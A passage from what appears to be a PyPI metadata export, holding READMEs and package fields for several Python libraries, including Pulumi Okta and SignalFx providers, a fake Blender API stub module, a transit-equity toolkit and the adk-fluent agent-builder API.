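    # Body for the Anthropic Messages API (max_tokens is a required field)
    return {"model": model, "max_tokens": 1024,
            "messages": [{"role": "user", "content": prompt}]}

def gemini_payload(prompt: str) -> dict:
    # Body for Gemini generateContent (the model is chosen via the URL path)
    return {"contents": [{"role": "user", "parts": [{"text": prompt}]}]}
```
Any endpoint that accepts one of these shapes should be usable as a provider.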
## Development
```bash
# Clone the repo
git clone https://github.com/ImFeH2/autopoe.git
cd autopoe
# Backend (hot reload)
uv sync
uv run fastapi dev
# Frontend (hot reload, separate terminal)
cd frontend
pnpm install
pnpm dev
```
| text/markdown | null | ImFeH2 <i@feh2.im> | null | null | null | null | [] | [] | null | null | >=3.12 | [] | [] | [] | [
"fastapi[standard]",
"httpx>=0.28.0",
"loguru>=0.7.0",
"pydantic-settings>=2.12.0",
"python-dotenv>=1.2.1",
"uvicorn>=0.41.0"
] | [] | [] | [] | [] | uv/0.10.4 {"installer":{"name":"uv","version":"0.10.4","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":true} | 2026-02-20T06:44:13.901211 | autopoe-0.2.3-py3-none-any.whl | 366,221 | 01/9b/860838d86bceda5ce59d6c212e7476ef3363708115ac03b574669ec17224/autopoe-0.2.3-py3-none-any.whl | py3 | bdist_wheel | null | false | 97234e46d101b49b049f9f665518e875 | 98639debb6c0911409890413a98651f67159c66013e327b4e38febebce750c85 | 019b860838d86bceda5ce59d6c212e7476ef3363708115ac03b574669ec17224 | Apache-2.0 | [
"LICENSE"
] | 90 |
2.4 | fake-bpy-module-latest | 20260220 | Collection of the fake Blender Python API module for the code completion. | # Fake Blender Python API module collection: fake-bpy-module
fake-bpy-module is a collection of fake Blender Python API modules that enable
code completion in commonly used IDEs.
Note: A similar project for the Blender Game Engine (BGE) is available at
[fake-bge-module](https://github.com/nutti/fake-bge-module), which targets
[UPBGE](https://upbge.org/).

*Your support helps ensure the long-term maintenance of this project.*
*You can support its development via*
**[GitHub Sponsors](https://github.com/sponsors/nutti)**.
*See [the contribution document](CONTRIBUTING.md) for details on*
*how to support it.*
## Requirements
fake-bpy-module uses the `typing` module and type hints available from
Python 3.8. Make sure your Python version is >= 3.8.
## Install
fake-bpy-module can be installed via a pip package, or pre-generated modules.
You can also generate and install modules manually.
### Install via pip package
fake-bpy-module is registered to PyPI.
You can install it as a pip package.
#### Install the latest package
To install fake-bpy-module for the latest Blender build (a main-branch daily
build powered by [nutti/blender-daily-build](https://github.com/nutti/blender-daily-build)),
run the command below.
```sh
pip install fake-bpy-module
```
or, specify version "latest".
```sh
pip install fake-bpy-module-latest
```
#### Install a version-specific package
To install a version-specific package, run the command below.
```sh
pip install fake-bpy-module-<version>
```
For example, to install fake-bpy-module for Blender 2.93, run the command below.
```sh
pip install fake-bpy-module-2.93
```
*Note: PyCharm users should change the value of `idea.max.intellisense.filesize` in
the `idea.properties` file to more than 2600, because some modules are too big
for IntelliSense to handle by default.*
##### Supported Blender Version
|Version|PyPI|
|---|---|
|2.78|[https://pypi.org/project/fake-bpy-module-2.78/](https://pypi.org/project/fake-bpy-module-2.78/)|
|2.79|[https://pypi.org/project/fake-bpy-module-2.79/](https://pypi.org/project/fake-bpy-module-2.79/)|
|2.80|[https://pypi.org/project/fake-bpy-module-2.80/](https://pypi.org/project/fake-bpy-module-2.80/)|
|2.81|[https://pypi.org/project/fake-bpy-module-2.81/](https://pypi.org/project/fake-bpy-module-2.81/)|
|2.82|[https://pypi.org/project/fake-bpy-module-2.82/](https://pypi.org/project/fake-bpy-module-2.82/)|
|2.83|[https://pypi.org/project/fake-bpy-module-2.83/](https://pypi.org/project/fake-bpy-module-2.83/)|
|2.90|[https://pypi.org/project/fake-bpy-module-2.90/](https://pypi.org/project/fake-bpy-module-2.90/)|
|2.91|[https://pypi.org/project/fake-bpy-module-2.91/](https://pypi.org/project/fake-bpy-module-2.91/)|
|2.92|[https://pypi.org/project/fake-bpy-module-2.92/](https://pypi.org/project/fake-bpy-module-2.92/)|
|2.93|[https://pypi.org/project/fake-bpy-module-2.93/](https://pypi.org/project/fake-bpy-module-2.93/)|
|3.0|[https://pypi.org/project/fake-bpy-module-3.0/](https://pypi.org/project/fake-bpy-module-3.0/)|
|3.1|[https://pypi.org/project/fake-bpy-module-3.1/](https://pypi.org/project/fake-bpy-module-3.1/)|
|3.2|[https://pypi.org/project/fake-bpy-module-3.2/](https://pypi.org/project/fake-bpy-module-3.2/)|
|3.3|[https://pypi.org/project/fake-bpy-module-3.3/](https://pypi.org/project/fake-bpy-module-3.3/)|
|3.4|[https://pypi.org/project/fake-bpy-module-3.4/](https://pypi.org/project/fake-bpy-module-3.4/)|
|3.5|[https://pypi.org/project/fake-bpy-module-3.5/](https://pypi.org/project/fake-bpy-module-3.5/)|
|3.6|[https://pypi.org/project/fake-bpy-module-3.6/](https://pypi.org/project/fake-bpy-module-3.6/)|
|4.0|[https://pypi.org/project/fake-bpy-module-4.0/](https://pypi.org/project/fake-bpy-module-4.0/)|
|4.1|[https://pypi.org/project/fake-bpy-module-4.1/](https://pypi.org/project/fake-bpy-module-4.1/)|
|4.2|[https://pypi.org/project/fake-bpy-module-4.2/](https://pypi.org/project/fake-bpy-module-4.2/)|
|4.3|[https://pypi.org/project/fake-bpy-module-4.3/](https://pypi.org/project/fake-bpy-module-4.3/)|
|4.4|[https://pypi.org/project/fake-bpy-module-4.4/](https://pypi.org/project/fake-bpy-module-4.4/)|
|4.5|[https://pypi.org/project/fake-bpy-module-4.5/](https://pypi.org/project/fake-bpy-module-4.5/)|
|5.0|[https://pypi.org/project/fake-bpy-module-5.0/](https://pypi.org/project/fake-bpy-module-5.0/)|
|latest|[https://pypi.org/project/fake-bpy-module/](https://pypi.org/project/fake-bpy-module/)|
||[https://pypi.org/project/fake-bpy-module-latest/](https://pypi.org/project/fake-bpy-module-latest/)|
### Install via pre-generated modules
Download pre-generated modules from the [Release page](https://github.com/nutti/fake-bpy-module/releases).
The installation process for pre-generated modules differs by IDE.
See the following guides for details.
* [PyCharm](docs/setup_pycharm.md)
* [Visual Studio Code](docs/setup_visual_studio_code.md)
* [All Text Editor (Install as Python module)](docs/setup_all_text_editor.md)
### Generate Modules Manually
You can also generate modules manually.
See [Generate Module](docs/generate_modules.md) for details.
## Change Log
See [CHANGELOG.md](CHANGELOG.md)
## Bug Reports / Feature Requests / Discussions
To report a bug, request a feature, or discuss this project, see
[ISSUES.md](ISSUES.md).
[fake-bpy-module channel](https://discord.gg/dGU9et5S2d) is
available on the Discord server.
Timely discussions and release announcements about fake-bpy-module are
made in this channel.
## Contribution
If you want to contribute to this project, see [CONTRIBUTING.md](CONTRIBUTING.md).
## Project Authors
### Owner
[**@nutti**](https://github.com/nutti)
Indie Game/Application Developer.
I spend most of my time improving Blender and Unreal Engine by
providing extensions.
Support via [GitHub Sponsors](https://github.com/sponsors/nutti)
* CONTACTS: [Twitter](https://twitter.com/nutti__)
* WEBSITE: [Japanese Only](https://colorful-pico.net/)
### Contributors
* [**@grische**](https://github.com/grische)
* [**@echantry**](https://github.com/echantry)
* [**@kant**](https://github.com/kant)
* [**@theoryshaw**](https://github.com/theoryshaw)
* [**@espiondev**](https://github.com/espiondev)
* [**@JonathanPlasse**](https://github.com/JonathanPlasse)
* [**@UuuNyaa**](https://github.com/UuuNyaa)
* [**@Road-hog123**](https://github.com/Road-hog123)
* [**@Andrej730**](https://github.com/Andrej730)
* [**@ice3**](https://github.com/ice3)
* [**@almarouk**](https://github.com/almarouk)
* [**@UnknownLITE**](https://github.com/UnknownLITE)
* [**@emmanuel-ferdman**](https://github.com/emmanuel-ferdman)
| text/markdown | nutti | nutti.metro@gmail.com | nutti | nutti.metro@gmail.com | null | null | [
"Topic :: Multimedia :: Graphics :: 3D Modeling",
"Topic :: Multimedia :: Graphics :: 3D Rendering",
"Topic :: Text Editors :: Integrated Development Environments (IDE)",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License"
] | [
"Windows"
] | null | null | >=3.8 | [] | [] | [] | [] | [] | [] | [] | [
"Homepage, https://github.com/nutti/fake-bpy-module",
"Documentation, https://github.com/nutti/fake-bpy-module/blob/main/README.md",
"Source, https://github.com/nutti/fake-bpy-module",
"Download, https://github.com/nutti/fake-bpy-module/releases",
"Bug Tracker, https://github.com/nutti/fake-bpy-module/issues",
"Release Notes, https://github.com/nutti/fake-bpy-module/blob/main/CHANGELOG.md"
] | twine/6.1.0 CPython/3.8.20 | 2026-02-20T06:44:13.312733 | fake_bpy_module_latest-20260220.tar.gz | 967,178 | be/27/b18beae2b8c2c74a44aa34f7cef5b43d2996a17668a61c0fa7265be2991c/fake_bpy_module_latest-20260220.tar.gz | source | sdist | null | false | f5a9a26ab3f212bbee5422c747b02f21 | 27a9a8d53a8ba9188307218a6a0e28dedc475e266fa711a7c02e8cd5c2470276 | be27b18beae2b8c2c74a44aa34f7cef5b43d2996a17668a61c0fa7265be2991c | null | [] | 479 |
2.4 | pyquity | 1.4.0 | Python toolkit for building and analyzing multimodal street and transit networks with a focus on accessibility and distributive equity | ## PyQuity
PyQuity is a compact Python toolkit for building and analyzing multimodal street and transit networks with a focus on accessibility and distributive equity. Quickly generate graphs and grids, attach POIs/GTFS, compute route-based accessibility, and evaluate equity (sufficientarianism, egalitarianism, utilitarianism) with seamless GeoPandas/NetworkX integration.
## Installation
PyQuity can be installed via PyPI:
```bash
pip install pyquity
```
## Examples
```python
import pyquity
# Create base graphs
G_walk = pyquity.graph_from_place('Barrie, Canada', network_type='walk')
G_bike = pyquity.graph_from_place('Barrie, Canada', network_type='bike')
# Create GTFS graph (GTFS zip file)
G_gtfs = pyquity.graph_from_gtfs('gtfs.zip')
# Combine base graphs with GTFS graph
MG_walk = pyquity.multimodel_graph(G_walk, G_gtfs)
MG_bike = pyquity.multimodel_graph(G_bike, G_gtfs)
```
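The three equity principles mentioned above differ in what they measure over a distribution of accessibility scores. A toy illustration on plain numbers follows (the function names here are hypothetical, not PyQuity's API):
```python
def utilitarian(scores):
    """Utilitarianism: a higher average accessibility is better."""
    return sum(scores) / len(scores)

def egalitarian_gap(scores):
    """Egalitarianism: a smaller gap between best- and worst-served is better."""
    return max(scores) - min(scores)

def sufficientarian_share(scores, threshold):
    """Sufficientarianism: more people at or above a sufficiency threshold is better."""
    return sum(s >= threshold for s in scores) / len(scores)

scores = [0.2, 0.5, 0.6, 0.9]  # accessibility per population unit
assert abs(utilitarian(scores) - 0.55) < 1e-9
assert abs(egalitarian_gap(scores) - 0.7) < 1e-9
assert sufficientarian_share(scores, threshold=0.5) == 0.75
```
PyQuity applies measures of this kind to route-based accessibility computed on the multimodal graphs built above.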
| text/markdown | pannawatr | null | null | null | MIT | null | [
"Programming Language :: Python :: 3"
] | [] | null | null | >=3.9 | [] | [] | [] | [
"osmnx>=2.0.0",
"geopandas>=1.0.0",
"shapely>=2.0.0",
"networkx>=3.2",
"numpy>=1.23",
"pandas>=2.0",
"scipy>=1.10",
"matplotlib>=3.7",
"pyproj>=3.5",
"partridge>=1.1",
"geopy>=2.4",
"scikit-learn>=1.6"
] | [] | [] | [] | [
"Repository, https://github.com/pannawatr/pyquity"
] | twine/6.2.0 CPython/3.9.6 | 2026-02-20T06:44:03.367981 | pyquity-1.4.0.tar.gz | 8,559 | 37/81/95cab9b888e4dfc06b7e673c8f526bc27a2c785a46f13fb98f89f8681809/pyquity-1.4.0.tar.gz | source | sdist | null | false | ab9d72660eccd01bd3b153d290558bdc | 5e276ac072ff6df506878d641b69ccfc58251a7a97f8ceeaee0162e5b18f7f27 | 378195cab9b888e4dfc06b7e673c8f526bc27a2c785a46f13fb98f89f8681809 | null | [
"LICENSE"
] | 238 |
2.4 | pulumi-okta | 6.3.0a1771569112 | A Pulumi package for creating and managing okta resources. | [](https://github.com/pulumi/pulumi-okta/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/okta)
[](https://pypi.org/project/pulumi-okta)
[](https://badge.fury.io/nu/pulumi.okta)
[](https://pkg.go.dev/github.com/pulumi/pulumi-okta/sdk/v4/go)
[](https://github.com/pulumi/pulumi-okta/blob/master/LICENSE)
# Okta Resource Provider
The Okta resource provider for Pulumi lets you manage Okta resources in your cloud programs. To use
this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
```bash
npm install @pulumi/okta
```
or `yarn`:
```bash
yarn add @pulumi/okta
```
### Python
To use from Python, install using `pip`:
```bash
pip install pulumi_okta
```
### Go
To use from Go, use `go get` to grab the latest version of the library:
```bash
go get github.com/pulumi/pulumi-okta/sdk/v4
```
### .NET
To use from .NET, install using `dotnet add package`:
```bash
dotnet add package Pulumi.Okta
```
## Configuration
The following configuration points are available:
- `okta:orgName` - (Required) The org name of your Okta account; for example, `dev-123.oktapreview.com` has an org name
of `dev-123`. May be set via the `OKTA_ORG_NAME` environment variable.
- `okta:baseUrl` - (Required) The domain of your Okta account; for example, `dev-123.oktapreview.com` has a base URL of
`oktapreview.com`. May be set via the `OKTA_BASE_URL` environment variable.
- `okta:apiToken` - (Required) The API token used to interact with your Okta org. May be set via the `OKTA_API_TOKEN`
environment variable.
- `okta:backoff` - (Optional) Whether to use an exponential backoff strategy for rate limits; the default is `true`.
- `okta:maxRetries` - (Optional) Maximum number of retries to attempt before returning an error; the default is `5`.
- `okta:maxWaitSeconds` - (Optional) Maximum seconds to wait when a rate limit is hit; the default is `300`.
- `okta:minWaitSeconds` - (Optional) Minimum seconds to wait when a rate limit is hit; the default is `30`.
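For example, a stack can be configured with the Pulumi CLI using the documentation's example org (the token value is a placeholder, stored encrypted via `--secret`):
```bash
pulumi config set okta:orgName dev-123
pulumi config set okta:baseUrl oktapreview.com
pulumi config set --secret okta:apiToken <your-api-token>
```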
## Reference
For further information, please visit [the Okta provider docs](https://www.pulumi.com/docs/intro/cloud-providers/okta)
or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/okta).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, okta | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-okta"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:43:33.441852 | pulumi_okta-6.3.0a1771569112.tar.gz | 495,699 | b4/a2/13a71205bfc10708501d8e83e0bdaaad75fe0c00bceb6c723650d4d321b0/pulumi_okta-6.3.0a1771569112.tar.gz | source | sdist | null | false | 134ecbbe217b91f6c7530b5113b0c184 | e163d376aef0e2eb929bbf819409a4e7219f4405253bf7d5a3a513293a7401bf | b4a213a71205bfc10708501d8e83e0bdaaad75fe0c00bceb6c723650d4d321b0 | null | [] | 220 |
2.4 | sfufe-hs300 | 1.0.0 | 上海财经大学金融时间序列分析专用-沪深300指数数据库 | # sfufe_hs300
A CSI 300 Index (000300) database for the financial time series analysis course at the Shanghai University of Finance and Economics.
## Installation
```bash
pip install sfufe_hs300
```
## Usage
```python
import sfufe_hs300

# Load the CSI 300 financial time series data
hs300_df = sfufe_hs300.load_hs300_data()
print("First 5 rows of CSI 300 data:")
print(hs300_df.head())

# Get basic information about the dataset
info = sfufe_hs300.get_hs300_info()
print("\nDataset information:")
print(info)
```
| text/markdown | 上海财经大学金融时间序列教学专用 | your_email@example.com | null | null | MIT | null | [
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Operating System :: OS Independent",
"Intended Audience :: Education",
"Topic :: Office/Business :: Financial :: Investment"
] | [] | https://github.com/your_username/sfufe_hs300 | null | >=3.8 | [] | [] | [] | [
"pandas>=1.5.0"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.11.7 | 2026-02-20T06:43:03.300969 | sfufe_hs300-1.0.0.tar.gz | 124,503 | 5d/28/a3c7f6b8fa2992843e88c9064afe0262be07428f6d8b7aac5700d1c68e62/sfufe_hs300-1.0.0.tar.gz | source | sdist | null | false | 0616e6653c6dea6a364b0e3d27473afc | 71915ba414e17e7d679ab31cc523c3474e38035145b86a47724a42f0bad59dcc | 5d28a3c7f6b8fa2992843e88c9064afe0262be07428f6d8b7aac5700d1c68e62 | null | [
"LICENSE"
] | 251 |
2.4 | pulumi-signalfx | 7.22.0a1771569357 | A Pulumi package for creating and managing SignalFx resources. | [](https://github.com/pulumi/pulumi-signalfx/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/signalfx)
[](https://pypi.org/project/pulumi-signalfx)
[](https://badge.fury.io/nu/pulumi.signalfx)
[](https://pkg.go.dev/github.com/pulumi/pulumi-signalfx/sdk/v7/go)
[](https://github.com/pulumi/pulumi-signalfx/blob/master/LICENSE)
# SignalFx Resource Provider
The SignalFx resource provider for Pulumi lets you manage SignalFx resources in your cloud programs. To use
this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
```bash
npm install @pulumi/signalfx
```
or `yarn`:
```bash
yarn add @pulumi/signalfx
```
### Python
To use from Python, install using `pip`:
```bash
pip install pulumi_signalfx
```
### Go
To use from Go, use `go get` to grab the latest version of the library:
```bash
go get github.com/pulumi/pulumi-signalfx/sdk/v7
```
### .NET
To use from .NET, install using `dotnet add package`:
```bash
dotnet add package Pulumi.Signalfx
```
## Configuration
The following configuration points are available:
- `signalfx:authToken` - (Required) The auth token for authentication. This can also be set via the `SFX_AUTH_TOKEN`
environment variable.
- `signalfx:apiUrl` - (Optional) The API URL to use for communicating with SignalFx. This is helpful for organizations
that need to set their realm or use a proxy. Note: you likely want to change `customAppUrl` too!
- `signalfx:customAppUrl` - (Optional) The application URL that users should use to interact with assets in the browser.
This is used by organizations using specific realms or those with a custom SSO domain.
## Reference
For further information, please visit [the SignalFx provider docs](https://www.pulumi.com/docs/intro/cloud-providers/signalfx) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/signalfx).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, signalfx | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-signalfx"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:42:34.559651 | pulumi_signalfx-7.22.0a1771569357.tar.gz | 152,643 | 6a/ea/5fee03f2aa2d4058a9b9d292890c378fcb22b3e69680110dfc7d5d529a66/pulumi_signalfx-7.22.0a1771569357.tar.gz | source | sdist | null | false | 335d75c678963d5964effca6fc4ca8c7 | b40363d0a7962a752656482e6be8f809f84c9896215866efbd32252e3a227def | 6aea5fee03f2aa2d4058a9b9d292890c378fcb22b3e69680110dfc7d5d529a66 | null | [] | 219 |
2.4 | calculus-cpp | 0.4.0 | High-performance scientific computing with Auto-Differentiation | CalCulus v0.4.0: A C++-powered scientific engine for Python featuring Scalar/Vec3 algebra, solvers, and forward-mode automatic differentiation.
| null | LegedsDaD | null | null | null | null | null | [
"Programming Language :: Python :: 3",
"Programming Language :: C++",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
] | [] | null | null | >=3.6 | [] | [] | [] | [
"pybind11>=2.6.0"
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:42:25.169305 | calculus_cpp-0.4.0.tar.gz | 5,857 | 70/e7/789919741f38640d87f16144fd633b9c74e617376bae61d868cd9fe4db92/calculus_cpp-0.4.0.tar.gz | source | sdist | null | false | 262a654ebba92121a25c3d0561d0d4f6 | 4f655a9b023bde6bd0ae93bb651ea8f92e6aaadc6abed1381439c30de61fb81d | 70e7789919741f38640d87f16144fd633b9c74e617376bae61d868cd9fe4db92 | null | [
"LICENSE"
] | 1,116 |
2.4 | adk-fluent | 0.6.0 | Fluent builder API for Google's Agent Development Kit (ADK) | # adk-fluent
Fluent builder API for Google's [Agent Development Kit (ADK)](https://google.github.io/adk-docs/). Reduces agent creation from 22+ lines to 1-3 lines while producing identical native ADK objects.
[](https://github.com/vamsiramakrishnan/adk-fluent/actions/workflows/ci.yml)
[](https://pypi.org/project/adk-fluent/)
[](https://github.com/vamsiramakrishnan/adk-fluent/blob/master/LICENSE)
[](https://vamsiramakrishnan.github.io/adk-fluent/)
[](https://peps.python.org/pep-0561/)
[](https://google.github.io/adk-docs/)
## Install
```bash
pip install adk-fluent
```
Autocomplete works immediately -- the package ships with `.pyi` type stubs for every builder. Type `Agent("name").` and your IDE shows all available methods with type hints.
### IDE Setup
**VS Code** -- install the [Pylance](https://marketplace.visualstudio.com/items?itemName=ms-python.vscode-pylance) extension (included in the Python extension pack). Autocomplete and type checking work out of the box.
**PyCharm** -- works automatically. The `.pyi` stubs are bundled in the package and PyCharm discovers them on install.
**Neovim (LSP)** -- use [pyright](https://github.com/microsoft/pyright) as your language server. Stubs are picked up automatically.
### Discover the API
```python
from adk_fluent import Agent
agent = Agent("demo")
# agent.  <- autocomplete shows: .model(), .instruct(), .tool(), .build(), ...
# Typos are caught at definition time, not runtime:
# agent.instuction("oops")  -> AttributeError: 'instuction' is not a recognized field.
#                              Did you mean: 'instruction'?
# Inspect any builder's current state:
print(agent.model("gemini-2.5-flash").instruct("Help.").explain())
# Agent: demo
# Config fields: model, instruction
# See everything available:
print(dir(agent)) # All methods including forwarded ADK fields
```
## Quick Start
```python
from adk_fluent import Agent, Pipeline, FanOut, Loop
# Simple agent — model as optional second arg or via .model()
agent = Agent("helper", "gemini-2.5-flash").instruct("You are a helpful assistant.").build()
# Pipeline — build with .step() or >> operator
pipeline = (
Pipeline("research")
.step(Agent("searcher", "gemini-2.5-flash").instruct("Search for information."))
.step(Agent("writer", "gemini-2.5-flash").instruct("Write a summary."))
.build()
)
# Fan-out — build with .branch() or | operator
fanout = (
FanOut("parallel_research")
.branch(Agent("web", "gemini-2.5-flash").instruct("Search the web."))
.branch(Agent("papers", "gemini-2.5-flash").instruct("Search papers."))
.build()
)
# Loop — build with .step() + .max_iterations() or * operator
loop = (
Loop("refine")
.step(Agent("writer", "gemini-2.5-flash").instruct("Write draft."))
.step(Agent("critic", "gemini-2.5-flash").instruct("Critique."))
.max_iterations(3)
.build()
)
```
Every `.build()` returns a real ADK object (`LlmAgent`, `SequentialAgent`, etc.), fully compatible with `adk web`, `adk run`, and `adk deploy`.
### Two Styles, Same Result
Every workflow can be expressed two ways -- the explicit builder API or the expression operators. Both produce identical ADK objects:
```python
# Explicit builder style — readable, IDE-friendly
pipeline = (
Pipeline("research")
.step(Agent("web", "gemini-2.5-flash").instruct("Search web.").outputs("web_data"))
.step(Agent("analyst", "gemini-2.5-flash").instruct("Analyze {web_data}."))
.build()
)
# Operator style — compact, composable
pipeline = (
Agent("web", "gemini-2.5-flash").instruct("Search web.").outputs("web_data")
>> Agent("analyst", "gemini-2.5-flash").instruct("Analyze {web_data}.")
).build()
```
The builder style shines for complex multi-step workflows where each step is configured with callbacks, tools, and context. The operator style excels at composing reusable sub-expressions:
```python
# Complex builder-style pipeline with tools and callbacks
pipeline = (
Pipeline("customer_support")
.step(
Agent("classifier", "gemini-2.5-flash")
.instruct("Classify the customer's intent.")
.outputs("intent")
.before_model(log_fn)
)
.step(
Agent("resolver", "gemini-2.5-flash")
.instruct("Resolve the {intent} issue.")
.tool(lookup_customer)
.tool(create_ticket)
.history("none")
)
.step(
Agent("responder", "gemini-2.5-flash")
.instruct("Draft a response to the customer.")
.after_model(audit_fn)
)
.build()
)
# Same complexity, composed from reusable parts with operators
classify = Agent("classifier", "gemini-2.5-flash").instruct("Classify intent.").outputs("intent")
resolve = Agent("resolver", "gemini-2.5-flash").instruct("Resolve {intent}.").tool(lookup_customer)
respond = Agent("responder", "gemini-2.5-flash").instruct("Draft response.")
support_pipeline = classify >> resolve >> respond
# Reuse sub-expressions in different pipelines
escalation_pipeline = classify >> Agent("escalate", "gemini-2.5-flash").instruct("Escalate.")
```
### Pipeline Architecture
```mermaid
graph TD
n1[["customer_support (sequence)"]]
n2["classifier"]
n3["resolver"]
n4["responder"]
n2 --> n3
n3 --> n4
```
## Expression Language
Nine operators compose any agent topology:
| Operator | Meaning | ADK Type |
|----------|---------|----------|
| `a >> b` | Sequence | `SequentialAgent` |
| `a >> fn` | Function step | Zero-cost transform |
| `a \| b` | Parallel | `ParallelAgent` |
| `a * 3` | Loop (fixed) | `LoopAgent` |
| `a * until(pred)` | Loop (conditional) | `LoopAgent` + checkpoint |
| `a @ Schema` | Typed output | `output_schema` |
| `a // b` | Fallback | First-success chain |
| `Route("key").eq(...)` | Branch | Deterministic routing |
| `S.pick(...)`, `S.rename(...)` | State transforms | Dict operations via `>>` |
Eight control loop primitives for agent orchestration:
| Primitive | Purpose | ADK Mechanism |
|-----------|---------|---------------|
| `tap(fn)` | Observe state without mutating | Custom `BaseAgent` (no LLM) |
| `expect(pred, msg)` | Assert state contract | Raises `ValueError` on failure |
| `.mock(responses)` | Bypass LLM for testing | `before_model_callback` → `LlmResponse` |
| `.retry_if(pred)` | Retry while condition holds | `LoopAgent` + checkpoint escalate |
| `map_over(key, agent)` | Iterate agent over list | Custom `BaseAgent` loop |
| `.timeout(seconds)` | Time-bound execution | `asyncio` deadline + cancel |
| `gate(pred, msg)` | Human-in-the-loop approval | `EventActions(escalate=True)` |
| `race(a, b, ...)` | First-to-finish wins | `asyncio.wait(FIRST_COMPLETED)` |
All operators are **immutable** -- sub-expressions can be safely reused:
```python
review = agent_a >> agent_b
pipeline_1 = review >> agent_c # Independent
pipeline_2 = review >> agent_d # Independent
```
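The immutability guarantee can be pictured as composition building new frozen nodes instead of mutating its operands. A minimal sketch under that assumption (illustrative only, not the actual adk-fluent internals):

```python
from dataclasses import dataclass

# Hypothetical model: each ">>" returns a NEW frozen node, so a reused
# sub-expression can never be mutated by later compositions.
@dataclass(frozen=True)
class Seq:
    steps: tuple

    def __rshift__(self, other):
        # ">>" appends without touching self
        tail = other.steps if isinstance(other, Seq) else (other,)
        return Seq(self.steps + tail)

review = Seq(("a",)) >> Seq(("b",))
pipeline_1 = review >> Seq(("c",))
pipeline_2 = review >> Seq(("d",))

print(review.steps)      # ('a', 'b') -- unchanged by either pipeline
print(pipeline_1.steps)  # ('a', 'b', 'c')
print(pipeline_2.steps)  # ('a', 'b', 'd')
```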
### Function Steps
Plain Python functions compose with `>>` as zero-cost workflow nodes (no LLM call):
```python
def merge_research(state):
return {"research": state["web"] + "\n" + state["papers"]}
pipeline = web_agent >> merge_research >> writer_agent
```
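One plausible semantics for a function step (an assumption about the internals, not a spec): call `fn(state)` and merge the returned dict back into session state, with no LLM involved:

```python
def run_function_step(fn, state):
    # Hypothetical helper: apply a zero-cost function step to a state dict.
    # The function reads state and returns a dict of updates to merge back;
    # returning None leaves the state unchanged.
    updates = fn(state) or {}
    return {**state, **updates}

def merge_research(state):
    return {"research": state["web"] + "\n" + state["papers"]}

state = {"web": "W", "papers": "P"}
state = run_function_step(merge_research, state)
print(repr(state["research"]))  # 'W\nP'
```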
### Typed Output
`@` binds a Pydantic schema as the agent's output contract:
```python
from pydantic import BaseModel
class Report(BaseModel):
title: str
body: str
agent = Agent("writer").model("gemini-2.5-flash").instruct("Write.") @ Report
```
### Fallback Chains
`//` tries each agent in order -- first success wins:
```python
answer = (
Agent("fast").model("gemini-2.0-flash").instruct("Quick answer.")
// Agent("thorough").model("gemini-2.5-pro").instruct("Detailed answer.")
)
```
### Conditional Loops
`* until(pred)` loops until a predicate on session state is satisfied:
```python
from adk_fluent import until
loop = (
Agent("writer").model("gemini-2.5-flash").instruct("Write.").outputs("quality")
>> Agent("reviewer").model("gemini-2.5-flash").instruct("Review.")
) * until(lambda s: s.get("quality") == "good", max=5)
```
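The loop semantics described above can be sketched as a small driver: run the body, check the exit predicate, and stop after `max` iterations regardless. The `body` function here is a stand-in for the writer/reviewer pair, not real agent execution:

```python
def run_until(body, pred, max, state):
    # Hypothetical driver for "* until(pred, max=N)": run the loop body,
    # exit early when the predicate is satisfied, hard-stop at max.
    for _ in range(max):
        state = body(state)
        if pred(state):
            break
    return state

# Fake body: quality turns "good" on the third pass.
def body(s):
    passes = s["passes"] + 1
    return {"passes": passes, "quality": "good" if passes >= 3 else "poor"}

state = run_until(body, lambda s: s.get("quality") == "good", max=5, state={"passes": 0})
print(state)  # {'passes': 3, 'quality': 'good'}
```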
### State Transforms
`S` factories return dict transforms that compose with `>>`:
```python
from adk_fluent import S
pipeline = (
(web_agent | scholar_agent)
>> S.merge("web", "scholar", into="research")
>> S.default(confidence=0.0)
>> S.rename(research="input")
>> writer_agent
)
```
| Factory | Purpose |
|---------|---------|
| `S.pick(*keys)` | Keep only specified keys |
| `S.drop(*keys)` | Remove specified keys |
| `S.rename(**kw)` | Rename keys |
| `S.default(**kw)` | Fill missing keys |
| `S.merge(*keys, into=)` | Combine keys |
| `S.transform(key, fn)` | Map a single value |
| `S.compute(**fns)` | Derive new keys |
| `S.guard(pred)` | Assert invariant |
| `S.log(*keys)` | Debug-print |
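The factories above are ordinary dict-to-dict transforms. A minimal sketch of a few of them (illustrative only, not the packaged implementation; the `sep` join for `merge` is an assumption):
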